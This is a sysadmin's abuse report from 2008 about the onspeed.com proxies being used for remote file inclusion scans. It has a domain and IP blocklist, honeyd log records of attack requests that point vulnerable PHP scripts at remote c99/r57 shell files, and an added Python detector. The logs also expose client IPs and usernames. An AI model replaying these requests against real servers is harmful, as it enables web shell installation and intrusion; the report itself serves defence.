According to its website, onspeed.com is a service
that is meant to speed up browsing over slow connections.
If I have understood this correctly,
for just under 25 dollars you get access to a service
that answers browser requests from a cache of compressed data (deflate).
However, this also makes it possible
to run RFI scans at quite a high speed.
This is not meant as advertising.
I mean it seriously.
onspeed has not replied to my e-mails so far,
hence my recommendation to all admins, hostmasters and whoever else to block the following domains/IPs:
As of 3.10.2008 17:05
domain IP
---------------------------------------------------------
navaho.onspeed.com 72.3.137.82
yuma.onspeed.com 72.3.137.83
vanadium.onspeed.com 83.138.172.72
chromium.onspeed.com 83.138.172.76
silicon.onspeed.com 212.100.250.218
sulphur.onspeed.com 212.100.250.225
aluminium.onspeed.com 212.100.250.217
nickel.onspeed.com 212.100.250.230
Personally, I have no problem being a bit more generous:
72.3.137.0/24
83.138.172.0/24
212.100.250.0/24
Here is an excerpt from the abuse mail:
CODE:
Hello,
the following honeyd log lines
will show users that abuse your service for RFI hacking.
there will be only one sample per user,
but there were a lot of attacks.
please request full log file.
from honeyd:
###################################
--MARK--,"Sat Sep 27 16:55:44 CEST 2008","apache/HTTP","72.3.137.82","172.16.1.10",38441,80,
"GET //includes/mailaccess/errors.php?error=http://rolex.100webspace.net/clip.txt? HTTP/1.0
Host: [CENSORED].org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
X-Forwarded-For: 82.128.26.111
X-SlipStream-Username: innocentman
Via: 1.1 navaho.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
###################################
--MARK--,"Sat Sep 27 16:56:41 CEST 2008","apache/HTTP","72.3.137.83","172.16.1.10",38330,80,
"GET //includes/mailaccess/errors.php?error=http://www.pcguvenlik.com/portal/media/www.txt? HTTP/1.0
Host: [CENSORED].org
Accept: */*
Accept-Language: en-ca
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; 3P_UVRM 1.0.8.3; Crazy Browser 3.0.0 RC1)
X-Forwarded-For: 82.128.23.20
X-SlipStream-Username: nairalander
Via: 1.1 yuma.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
###################################
--MARK--,"Sat Sep 27 17:03:43 CEST 2008","apache/HTTP","83.138.172.72","172.16.1.10",46967,80,
"GET //includes/mailaccess/errors.php?error=http://myr.wz.cz/upload/skins/c99.txt? HTTP/1.0
Host: down.[CENSORED].org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-za
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Crazy Browser 3.0.0 RC1)
X-Forwarded-For: 41.219.246.12
X-SlipStream-Username: wizards817
Via: 1.1 vanadium.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
###################################
--MARK--,"Sat Sep 27 18:25:39 CEST 2008","apache/HTTP","72.3.137.82","172.16.1.10",39783,80,
"GET /index.php?l=http://vncownz.webcindario.com/r57?? HTTP/1.0
Host: www.[CENSORED].eu
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
X-Forwarded-For: 82.128.27.78
X-SlipStream-Username: dareosibo
Via: 1.1 navaho.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
###################################
--MARK--,"Sat Sep 27 20:24:01 CEST 2008","apache/HTTP","83.138.172.76","172.16.1.10",55206,80,
"GET /index.php?p=http://br.geocities.com/redcrew03/Manutd4life.txt??? HTTP/1.0
Host: www.[CENSORED].org
User-Agent: Opera/9.51 (Windows NT 5.1; U; en)
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
X-Forwarded-For: 196.1.179.153
X-SlipStream-Username: trSVSNyDQN
Via: 1.1 chromium.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
####################################
--MARK--,"Sat Sep 27 21:03:43 CEST 2008","apache/HTTP","212.100.250.218","172.16.1.10",46552,80,
"GET /modules/vwar/convert/mvcw_conver.php?step=http://blog.justa.ru/media/uk/naija.txt? HTTP/1.0
Host: www.[CENSORED].net
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705; Crazy Browser 3.0.0 RC1)
X-Forwarded-For: 82.128.9.212
X-SlipStream-Username: shoplinks102
Via: 1.1 silicon.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
####################################
--MARK--,"Sat Sep 27 22:34:01 CEST 2008","apache/HTTP","212.100.250.225","172.16.1.10",51038,80,
"GET /start_lobby.php?CONFIG[MWCHAT_Libs]=http://evilc0der.com/r57.txt?? HTTP/1.0
Host: www.[CENSORED].net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
X-Forwarded-For: 41.219.199.17
X-SlipStream-Username: urH3DjDh
Via: 1.1 sulphur.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
####################################
--MARK--,"Sun Sep 28 00:50:56 CEST 2008","apache/HTTP","72.3.137.82","172.16.1.10",45288,80,
"GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://white.be/info.txt? HTTP/1.0
Host: www.[CENSORED].eu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
X-Forwarded-For: 41.219.252.19
X-SlipStream-Username: keemodass
Via: 1.1 navaho.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
####################################
--MARK--,"Sun Sep 28 01:02:13 CEST 2008","apache/HTTP","212.100.250.218","172.16.1.10",44930,80,
"GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/francecard/c99.txt?? HTTP/1.0
Host: [CENSORED].org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
X-Forwarded-For: 82.128.22.101
X-SlipStream-Username: internetfast
Via: 1.1 silicon.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
####################################
--MARK--,"Sun Sep 28 01:19:42 CEST 2008","apache/HTTP","72.3.137.83","172.16.1.10",38086,80,
"GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.barthmaler.de/c99.txt?? HTTP/1.0
Host: [CENSORED].org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
X-Forwarded-For: 82.128.32.176
X-SlipStream-Username: uch3b3lgium
Via: 1.1 yuma.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
####################################
--MARK--,"Sun Sep 28 14:09:13 CEST 2008","apache/HTTP","212.100.250.218","172.16.1.10",44968,80,
"GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://midnightcr3w247.freehostia.com/bad.txt? HTTP/1.0
Host: [CENSORED].org
User-Agent: Opera/9.50 (Windows NT 5.1; U; en)
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
X-Forwarded-For: 82.128.33.207
X-SlipStream-Username: zeeeho
Via: 1.1 silicon.onspeed.com:3128 (squid/2.6.STABLE18)
Cache-Control: max-age=259200
Connection: keep-alive
",
--ENDMARK--
###################################
.....
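
An added example, not part of the original post or the abuse mail: a small Python triage script for honeyd records in the layout shown above. It flags requests whose query parameter value is an absolute remote URL, extracts the proxy-supplied headers, and checks the source address against the three /24 networks from the post. The function names and the sample record are assumptions made for illustration; only the proxy address, the Via value and the networks are taken from the page.

```python
import ipaddress
import re
from urllib.parse import parse_qsl

# The three /24 networks the post suggests blocking.
BLOCKED = [ipaddress.ip_network(n) for n in
           ("72.3.137.0/24", "83.138.172.0/24", "212.100.250.0/24")]
# Layout: --MARK--,"date","service","src","dst",sport,dport,"raw request",--ENDMARK--
RECORD = re.compile(r'--MARK--,"([^"]*)","[^"]*","([^"]*)","[^"]*",\d+,\d+,'
                    r'\s*"(.*?)",\s*--ENDMARK--', re.S)
REMOTE = re.compile(r"(?i)^(?:https?|ftp)://")
# Constructed sample in the excerpt's layout; hosts, client IPs and user name are placeholders.
SAMPLE = '''--MARK--,"Sat Sep 27 16:55:44 CEST 2008","apache/HTTP","72.3.137.82","172.16.1.10",38441,80,
"GET //inc/errors.php?cfg%5Bpath%5D=http://files.example.net/probe.txt? HTTP/1.0
Host: www.example.org
X-Forwarded-For: 192.0.2.44
X-SlipStream-Username: sampleuser
Via: 1.1 navaho.onspeed.com:3128 (squid/2.6.STABLE18)
",
--ENDMARK--
--MARK--,"Sat Sep 27 17:01:02 CEST 2008","apache/HTTP","198.51.100.7","172.16.1.10",40112,80,
"GET /index.php?page=news&ref=http HTTP/1.0
",
--ENDMARK--
'''

def remote_params(target):
    """Query parameters whose decoded value is an absolute remote URL."""
    query = target.partition("?")[2]  # urlsplit would read a leading // as a host
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE.match(v)]

def find_rfi(log_text):
    """Return one dict per logged request that carries a remote-URL parameter."""
    hits = []
    for when, src, raw in RECORD.findall(log_text):
        lines = raw.splitlines()
        parts = lines[0].split() if lines else []
        params = remote_params(parts[1]) if len(parts) >= 2 else []
        if not params:
            continue
        hdr = dict(l.split(": ", 1) for l in lines[1:] if ": " in l)
        hits.append({
            "time": when, "proxy_ip": src, "params": params,
            "in_blocklist": any(ipaddress.ip_address(src) in n for n in BLOCKED),
            # These headers are set by the proxy and cannot be verified here.
            "client": hdr.get("X-Forwarded-For"), "via": hdr.get("Via"),
            "account": hdr.get("X-SlipStream-Username")})
    return hits
```

Calling `find_rfi(SAMPLE)` returns one hit for the first record. The second record is skipped because none of its parameter values is a URL.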